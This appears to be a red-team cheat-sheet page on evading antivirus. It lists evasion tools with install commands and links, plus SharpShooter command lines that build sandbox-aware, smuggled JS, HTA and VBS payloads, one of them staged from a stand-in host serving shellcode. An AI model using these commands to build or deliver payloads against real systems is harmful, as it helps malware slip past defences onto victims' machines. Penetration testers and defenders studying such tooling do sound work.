Bypassing AV

Veil Framework

Install on Kali:

apt install veil
/usr/share/veil/config/setup.sh --force --silent

Reference: https://github.com/Veil-Framework/Veilarrow-up-right

Shellter

Source: https://www.shellterproject.com/download/arrow-up-right

apt install shellter

Sharpshooter

Javascript Payload Stageless:

SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

Stageless HTA Payload:

SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

Staged VBS:

SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

Reference: https://github.com/mdsecactivebreach/SharpShooterarrow-up-right

Donut

Source: https://github.com/TheWover/donutarrow-up-right

Vulcan

Source: https://github.com/praetorian-code/vulcanarrow-up-right

Scarecrow

Source: https://github.com/optiv/ScareCrowarrow-up-right

Last updated